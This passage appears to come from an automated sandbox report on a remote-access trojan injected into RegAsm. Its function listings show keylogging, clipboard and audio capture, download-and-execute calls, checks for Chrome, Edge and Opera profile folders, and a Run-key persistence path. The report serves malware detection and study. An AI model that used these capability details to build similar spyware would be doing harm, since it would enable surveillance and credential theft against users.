              • Instruction Fuzzy Hash: 18011732000109BBCF12AF55CC01EDA3BBAEF9D754F04511AFD5861221C3BAE861DBA5
              Function 004193E3 Relevance: 6.0, APIs: 4, Instructions: 43COMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: MetricsSystem
              • String ID:
              • API String ID: 4116985748-0
              • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
              • Instruction ID: 9a44d86f369c7068fc2c949f9b02ed5542bf43da40f6b7222f807aea32733f55
              • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
              • Instruction Fuzzy Hash: DFF0A471B043155BD744EA759C51A6F6BD5EBD4264F10043FF20887281EE78DC468785
              Function 00438F31 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
              Download Yara Rule
              APIs
              • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438F31
              • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438F36
              • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438F3B
                • Part of subcall function 0043A43A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A44B
              • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438F50
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
              • String ID:
              • API String ID: 1761009282-0
              • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
              • Instruction ID: 04dbcd9d80b8837b95b31ffc0e846904d80335f120ca5f78e3accc67d081205e
              • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
              • Instruction Fuzzy Hash: 59C04C15080781541C50B6B2210B2AE83461E7E38DFD074DFFCE0571038E4E043B653F
              Function 00442C5D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
              Download Yara Rule
              APIs
              • __startOneArgErrorHandling.LIBCMT ref: 00442CED
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: ErrorHandling__start
              • String ID: pow
              • API String ID: 3213639722-2276729525
              • Opcode ID: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
              • Instruction ID: c2a334fe3ab53b67a82bc2a1da04863f7f1ed5e2a579c87dfbcc8ae8a095d349
              • Opcode Fuzzy Hash: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
              • Instruction Fuzzy Hash: C6516DA1E0420296FB167B14CE4137B2BA4DB40751F704D7FF096823AAEB7D8C859A4F
              Function 0040B748 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
              • __Init_thread_footer.LIBCMT ref: 0040B797
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Init_thread_footer__onexit
              • String ID: [End of clipboard]$[Text copied to clipboard]
              • API String ID: 1881088180-3686566968
              • Opcode ID: fb1c81892c2e036c5d6c31f086f493dd212476ae9b22afc1b3a562318c09d8ed
              • Instruction ID: c7bebb0a0a15900a9cc4ffb6e17528162536323bfdf0e6139bd55c50ddf57f74
              • Opcode Fuzzy Hash: fb1c81892c2e036c5d6c31f086f493dd212476ae9b22afc1b3a562318c09d8ed
              • Instruction Fuzzy Hash: C0219F32A101054ACB14FB66D8829EDB379AF90318F10453FE505731E2EF386D4A8A9C
              Function 00451B37 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451D92,?,00000050,?,?,?,?,?), ref: 00451C12
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: ACP$OCP
              • API String ID: 0-711371036
              • Opcode ID: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
              • Instruction ID: fc24b39bc158c677debbea649066bee6e1bba6d32f28379ebc1c8ba741b2d3ba
              • Opcode Fuzzy Hash: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
              • Instruction Fuzzy Hash: BA217D22A4010063DB34CF54C940B9B326ADF50B27F568166ED09C7322F73AED44C39C
              Function 00404FF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67timeCOMMON
              Download Yara Rule
              APIs
              • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405030
                • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
              • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405087
              Strings
              • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: LocalTime
              • String ID: KeepAlive | Enabled | Timeout:
              • API String ID: 481472006-1507639952
              • Opcode ID: 889eda472554f13da5ed19224a724834adbe5322b7fc00b68ad75e81c6f62207
              • Instruction ID: 59903f388a44bacb81d563bcbf5ab321eb0051b597eccb46fab67989b44e7fd4
              • Opcode Fuzzy Hash: 889eda472554f13da5ed19224a724834adbe5322b7fc00b68ad75e81c6f62207
              • Instruction Fuzzy Hash: 1D21F2719046405BD710B7259C0676F7B64E751308F40087EE8491B2A6DA7D5A88CBEF
              Function 0041663B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62sleepfilenetworkCOMMON
              Download Yara Rule
              APIs
              • Sleep.KERNEL32 ref: 00416640
              • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166A2
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: DownloadFileSleep
              • String ID: !D@
              • API String ID: 1931167962-604454484
              • Opcode ID: 07a7ba679a22719b007f27f942da87136b12813d5d7402b4186b0f1ae2008f5d
              • Instruction ID: f21b004d79e7af0ef9ad63e4b6518ad07bb10e0138b316cec4f8e9f86784bb19
              • Opcode Fuzzy Hash: 07a7ba679a22719b007f27f942da87136b12813d5d7402b4186b0f1ae2008f5d
              • Instruction Fuzzy Hash: C6115171A083029AC714FF72D8969BE77A8AF54348F400C3FF546621E2EE3C9949C65A
              Function 0041B4EF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
              Download Yara Rule
              APIs
              • GetLocalTime.KERNEL32(00000000), ref: 0041B509
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: LocalTime
              • String ID: | $%02i:%02i:%02i:%03i
              • API String ID: 481472006-2430845779
              • Opcode ID: 0b58fb712609a629be2860926311a3a1d9782cd388fbf364b696734300abae58
              • Instruction ID: b0c371a91d376d28eb23a1cf2c2b6b2589463c7c7bf84255da33bc44f247512a
              • Opcode Fuzzy Hash: 0b58fb712609a629be2860926311a3a1d9782cd388fbf364b696734300abae58
              • Instruction Fuzzy Hash: 361181714082055AC304EB62D8419BFB3E9AB44348F50093FF895A21E1EF3CDA49C65A
              Function 0041AD17 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
              Download Yara Rule
              APIs
              • PathFileExistsW.SHLWAPI(00000000), ref: 0041AD3C
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: ExistsFilePath
              • String ID: alarm.wav$hYG
              • API String ID: 1174141254-2782910960
              • Opcode ID: 0e1c4e1224622d2e2eba9349cd815abebc3d2b7a1c969d03ea25083f5c27e476
              • Instruction ID: 1ebdaa4a32a078914063a8122a991a3a49773bb3edac1861de613ef54c78e1f6
              • Opcode Fuzzy Hash: 0e1c4e1224622d2e2eba9349cd815abebc3d2b7a1c969d03ea25083f5c27e476
              • Instruction Fuzzy Hash: 7A01F5B064460156C604F37698167EE37464B80319F00447FF68A266E2EFBC9D99C68F
              Function 0040B051 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
              • CloseHandle.KERNEL32(?), ref: 0040B0B4
              • UnhookWindowsHookEx.USER32 ref: 0040B0C7
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
              • String ID: Online Keylogger Stopped
              • API String ID: 1623830855-1496645233
              • Opcode ID: e1143dfe4ebbdf49b26d73ef465cebd6e20b11e5a8ab35f70cc7b7b67a3e30d6
              • Instruction ID: 2e372e3e3892c4e8816e9c8053feed756abc81e7e35a03d4dadb391bbfa0e77d
              • Opcode Fuzzy Hash: e1143dfe4ebbdf49b26d73ef465cebd6e20b11e5a8ab35f70cc7b7b67a3e30d6
              • Instruction Fuzzy Hash: 0101F5306002049BD7217B35C80B3BF7BA59B41305F40007FE642226D2EBB91845D7DE
              Function 004017EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
              Download Yara Rule
              APIs
              • waveInPrepareHeader.WINMM(?,00000020,?), ref: 00401849
              • waveInAddBuffer.WINMM(?,00000020), ref: 0040185F
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: wave$BufferHeaderPrepare
              • String ID: XMG
              • API String ID: 2315374483-813777761
              • Opcode ID: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
              • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
              • Opcode Fuzzy Hash: 84db4ebe13300bab6e2e85a4a45c37fcad2fa82ad9d185d6556c2711ca00a3b1
              • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
              Function 00448AE6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • IsValidLocale.KERNEL32(00000000,JD,00000000,00000001,?,?,00444AEA,?,?,004444CA,?,00000004), ref: 00448B32
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: LocaleValid
              • String ID: IsValidLocaleName$JD
              • API String ID: 1901932003-2234456777
              • Opcode ID: 8ed56ec59b6d4db5e47e15cf77ebd157549768ac78bfa39ea2b76d2b56dc7c94
              • Instruction ID: c43517d2c5aad0833927174c53c021eab8a1ac695cd7bc198788f3b2bcf9e263
              • Opcode Fuzzy Hash: 8ed56ec59b6d4db5e47e15cf77ebd157549768ac78bfa39ea2b76d2b56dc7c94
              • Instruction Fuzzy Hash: D6F05230A80308F7DB106B60DC06FAEBF58CB04B52F10017EFD046B291CE786E05929E
              Function 0040C4C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
              Download Yara Rule
              APIs
              • PathFileExistsW.SHLWAPI(00000000), ref: 0040C4F6
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: ExistsFilePath
              • String ID: UserProfile$\AppData\Local\Google\Chrome\
              • API String ID: 1174141254-4188645398
              • Opcode ID: d11da1c58d5dd2ef9da09c3ea68de0927d50847f2cce6e72d2cc7c3e9ccd8b86
              • Instruction ID: 529cceb54bdbac8586af3e6ebd5273a77adcdcd577382419881006e182ae29c8
              • Opcode Fuzzy Hash: d11da1c58d5dd2ef9da09c3ea68de0927d50847f2cce6e72d2cc7c3e9ccd8b86
              • Instruction Fuzzy Hash: 96F05E31A00219A6C604BBF69C478BF7B3C9D50709B50017FBA01B61D3EE789945C6EE
              Function 0040C526 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
              Download Yara Rule
              APIs
              • PathFileExistsW.SHLWAPI(00000000), ref: 0040C559
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: ExistsFilePath
              • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
              • API String ID: 1174141254-2800177040
              • Opcode ID: 62d77e7710f88fd67431bbf20b3e0d601dfd53fd2a54c8c31c6ded84776c1d6f
              • Instruction ID: 330371ab8f71d6844e3501a7b0875f3b866c8fe31c1dcac5d822fe972055fe7f
              • Opcode Fuzzy Hash: 62d77e7710f88fd67431bbf20b3e0d601dfd53fd2a54c8c31c6ded84776c1d6f
              • Instruction Fuzzy Hash: ECF05E31A00219A6CA14B7B69C47CEF7B6C9D50705B10017FB602B61D2EE78994186EE
              Function 0040C589 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
              Download Yara Rule
              APIs
              • PathFileExistsW.SHLWAPI(00000000), ref: 0040C5BC
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: ExistsFilePath
              • String ID: AppData$\Opera Software\Opera Stable\
              • API String ID: 1174141254-1629609700
              • Opcode ID: cbec4c721474318851a7c02d4d9936ce5133d15acec931d959add52bdfa17e90
              • Instruction ID: 49b076bb86b4c8db4da1bdedad10e463925805c403c57d636a3174f469f12df7
              • Opcode Fuzzy Hash: cbec4c721474318851a7c02d4d9936ce5133d15acec931d959add52bdfa17e90
              • Instruction Fuzzy Hash: 13F05E31A00319A6CA14B7B69C47CEF7B7C9D10709B40017BB601B61D2EE789D4586EA
              Function 0040B646 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
              Download Yara Rule
              APIs
              • GetKeyState.USER32(00000011), ref: 0040B64B
                • Part of subcall function 0040A3E0: GetForegroundWindow.USER32 ref: 0040A416
                • Part of subcall function 0040A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                • Part of subcall function 0040A3E0: GetKeyboardLayout.USER32 ref: 0040A429
                • Part of subcall function 0040A3E0: GetKeyState.USER32(00000010), ref: 0040A433
                • Part of subcall function 0040A3E0: GetKeyboardState.USER32(?), ref: 0040A43E
                • Part of subcall function 0040A3E0: ToUnicodeEx.USER32 ref: 0040A461
                • Part of subcall function 0040A3E0: ToUnicodeEx.USER32 ref: 0040A4C1
                • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,?,0040B82F,?,?,?,?,?,00000000), ref: 0040A662
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
              • String ID: [AltL]$[AltR]
              • API String ID: 2738857842-2658077756
              • Opcode ID: 2b71d764483a078f53a432e7892b7890680e208db1d279d2457640738fc20bd0
              • Instruction ID: e48b288e44f9d4c6b211653e2fe3bcc76c2b66b59b43e84e4aaf588e4500f4a3
              • Opcode Fuzzy Hash: 2b71d764483a078f53a432e7892b7890680e208db1d279d2457640738fc20bd0
              • Instruction Fuzzy Hash: 3BE0652134021052C828323E592F6BE2D51C742754B86057FF9826B6C5DABF4D1542CF
              Function 0044ECEC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
              Download Yara Rule
              APIs
              • GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
              • GetACP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED2E
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: uD
              • API String ID: 0-2547262877
              • Opcode ID: c5b08800a69d4838b4f5beafbc063674321feb547ffb76a205f46ddd03b66443
              • Instruction ID: 19c10458df6b4aed5d20bc802b22671fd2b069e30d3a1616a3713fc20edc201d
              • Opcode Fuzzy Hash: c5b08800a69d4838b4f5beafbc063674321feb547ffb76a205f46ddd03b66443
              • Instruction Fuzzy Hash: A5F0C871800105CBEB20DB55DC897697771BF11335F144755E4394A6E2C7B98C81CF49
              Function 0041618A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
              Download Yara Rule
              APIs
              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161A8
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: ExecuteShell
              • String ID: !D@$open
              • API String ID: 587946157-1586967515
              • Opcode ID: ef1b3a0f4602e6d199ecf0e45d17a7acf077c1a045a33f1301243906c424f492
              • Instruction ID: 73504a7432a82bf20c2cd712858cac99996ed9f8eaf32da6c0f13d1c3fa6c831
              • Opcode Fuzzy Hash: ef1b3a0f4602e6d199ecf0e45d17a7acf077c1a045a33f1301243906c424f492
              • Instruction Fuzzy Hash: 2FE0ED712483059AD614EA72DC91AFE7358AB54755F40083FF506514E2EE3C5849C65A
              Function 0040B6A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
              Download Yara Rule
              APIs
              • GetKeyState.USER32(00000012), ref: 0040B6A5
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: State
              • String ID: [CtrlL]$[CtrlR]
              • API String ID: 1649606143-2446555240
              • Opcode ID: 74451c87ab4e18a563cce8b4b99f8aefb6389db58d63b1dc50ea5b4c36b24e36
              • Instruction ID: bec5627f59812d2efb235ad4bfa8f6d19d2d97b3e0140e65676d9d4505e8418d
              • Opcode Fuzzy Hash: 74451c87ab4e18a563cce8b4b99f8aefb6389db58d63b1dc50ea5b4c36b24e36
              • Instruction Fuzzy Hash: 6FE04F2160021052C524363D5A1E67D2911CB52754B42096FF882A76CADEBF891543CF
              Function 0040E79F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
              • __Init_thread_footer.LIBCMT ref: 00410F29
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Init_thread_footer__onexit
              • String ID: ,kG$0kG
              • API String ID: 1881088180-2015055088
              • Opcode ID: 3543072a86426642cb3d95922a277c4e502be0bac8cf48ffd361c80e3a631357
              • Instruction ID: c595ded0a674a2b9ccc74dbc71d20adb946c68f5a758ea4f5ad5526f3cc50642
              • Opcode Fuzzy Hash: 3543072a86426642cb3d95922a277c4e502be0bac8cf48ffd361c80e3a631357
              • Instruction Fuzzy Hash: 35E0D8312149208EC214A32995829C93791DB4E335B61412BF414D72D5CBAEB8C1CA1D
              Function 00413A23 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
              Download Yara Rule
              APIs
              Strings
              • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A2F
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: DeleteOpenValue
              • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
              • API String ID: 2654517830-1051519024
              • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
              • Instruction ID: 6fb421a43559def270d35797bbb86f7c8bc210cd52a17bc53693ea6618a40a87
              • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
              • Instruction Fuzzy Hash: 99E0C23124420CFBDF104F71DD06FFA376CDB01F42F1006A5BA0692091C626DF049668
              Function 0040B869 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22fileCOMMON
              Download Yara Rule
              APIs
              • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B876
              • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8A1
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: DeleteDirectoryFileRemove
              • String ID: pth_unenc
              • API String ID: 3325800564-4028850238
              • Opcode ID: f0c530d5f410f6e48232dff94e8b4526202df80a5f9212f67769b953604160dd
              • Instruction ID: 8281cfb8de641f04b50c20d0c8e921e0d4b8d2282f61a3be21f0805504db5409
              • Opcode Fuzzy Hash: f0c530d5f410f6e48232dff94e8b4526202df80a5f9212f67769b953604160dd
              • Instruction Fuzzy Hash: 45E046321007119BCB14AB258C48AD6339CAF0031AF00486FA492A32A1DF38AC09CAA8
              Function 00412850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
              Download Yara Rule
              APIs
              • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
              • WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: ObjectProcessSingleTerminateWait
              • String ID: pth_unenc
              • API String ID: 1872346434-4028850238
              • Opcode ID: 1b0d5640518fcde21729cf1b02f36aec3fd37732ecf9f275e44c4103a8157302
              • Instruction ID: 1c2a9d3d993a2aa40768a62e13ec0bdc830226799852dc8a6b6faba0c59f1205
              • Opcode Fuzzy Hash: 1b0d5640518fcde21729cf1b02f36aec3fd37732ecf9f275e44c4103a8157302
              • Instruction Fuzzy Hash: 2FD01234189312FFD7350F60EE4DB043B98A705362F140265F428512F1C7A58994EA59
              Function 00440C91 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D27
              • GetLastError.KERNEL32 ref: 00440D35
              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440D90
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: ByteCharMultiWide$ErrorLast
              • String ID:
              • API String ID: 1717984340-0
              • Opcode ID: 06151d672a34678faa0f1c8d5979b725e0733317c82078799b35041d461e39d5
              • Instruction ID: f204e272a103731937cf510deb2d9f687334ef06d731906aa630a644c7418207
              • Opcode Fuzzy Hash: 06151d672a34678faa0f1c8d5979b725e0733317c82078799b35041d461e39d5
              • Instruction Fuzzy Hash: BA411871A00206EFEF218FA5C8447AB7BA5EF45310F10816BFA549B3A1DB38AD25C759
              Function 00411B5F Relevance: 5.1, APIs: 4, Instructions: 119COMMON
              Download Yara Rule
              APIs
              • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00411EF0), ref: 00411B8C
              • IsBadReadPtr.KERNEL32(?,00000014,00411EF0), ref: 00411C58
              • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C7A
              • SetLastError.KERNEL32(0000007E,00411EF0), ref: 00411C91
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: ErrorLastRead
              • String ID:
              • API String ID: 4100373531-0
              • Opcode ID: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
              • Instruction ID: 277f4bdee2933866d2d1c697a3b04f0a6a13197b354a533a519a822f1f8833ca
              • Opcode Fuzzy Hash: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
              • Instruction Fuzzy Hash: 37419C75244305DFE7248F18DC84BA7B3E8FB48711F00082EEA8A87661F739E845CB99